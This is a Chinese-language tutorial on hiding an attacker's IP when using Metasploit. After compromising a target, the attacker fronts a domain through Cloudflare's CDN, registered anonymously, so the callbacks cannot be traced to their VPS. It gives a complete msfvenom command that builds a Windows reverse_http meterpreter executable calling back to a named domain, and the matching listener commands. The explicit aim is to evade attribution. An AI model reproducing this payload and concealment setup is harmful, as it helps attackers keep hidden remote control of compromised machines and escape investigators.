Metasploit域名上线隐藏IP

概述

为什么要隐藏IP？
在拿下了目标机之后，目标机在内网里面，使用msf或者CS时，用自己的VPS做服务器的话，导致很容易被溯源。

域名上线原理

当我们访问域名时会经过域名解析 域名解析就是域名到IP地址的转换过程，那么就意味这我们访问域名实际上最后是访问的真实IP。

A记录： 将域名指向一个IPv4地址（例如：100.100.100.100），需要增加A记录。
CNAME记录： 如果将域名指向一个域名，实现与被指向域名相同的访问效果，需要增加CNAME记录。这个域名一般是主机服务商提供的一个域名。
MX记录： 建立电子邮箱服务，将指向邮件服务器地址，需要设置MX记录。建立邮箱时，一般会根据邮箱服务商提供的MX记录填写此记录。
NS记录： 域名解析服务器记录，如果要将子域名指定某个域名服务器来解析，需要设置NS记录。
TXT记录： 可任意填写，可为空。一般做一些验证记录时会使用此项，如：做SPF（反垃圾邮件）记录。
AAAA记录： 将主机名（或域名）指向一个IPv6地址（例如：ff03:0:0:0:0:0:0:c1），需要添加AAAA记录。

通过CDN上线MSF

CDN的全称是Content Delivery Network，即内容分发网络。其目的是通过在现有的Internet中增加一层新的CACHE(缓存)层，将网站的内容发布到最接近用户的网络”边缘“的节点，目的提高用户访问网站的速度。

CDN上线具体实现

基础配置:一台VPS、一个域名，这里的VPS最好是匿名的
既然是隐藏自身 那么域名肯定不能使用自己备案的域名

https://freenom.com/ 注册免费域名 注册失败,可以用gmail注册

https://cart.godaddy.com/ 注册匿名域名

https://www.cloudflare.com/ 免费CDN

1. 购买好域名之后，进入cloudflare.com添加域名。
   

2. 添加A记录。
   

3. 返回https://cart.godaddy.com/进行入门指南的设置。
   
   
   
   将所有的开关都关闭。

4. 编辑名称服务器，设置为cloudflare.com的名称服务器。
   点击改变
   
   
   

5. 检查是否配置成功。
   ping下该域名，查看是否为vps的IP地址，不是的话则配置成功。

配置成功。

6. MSF生成木马

msfvenom -p windows/x64/meterpreter/reverse_http LHOST=www.zsyyme.info LPORT=2095 -f exe -o shell.exe

7. MSF开启相对应监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set lhost www.zsyyme.info
set lport 2095
run

8. 用wireshark抓取流量即可！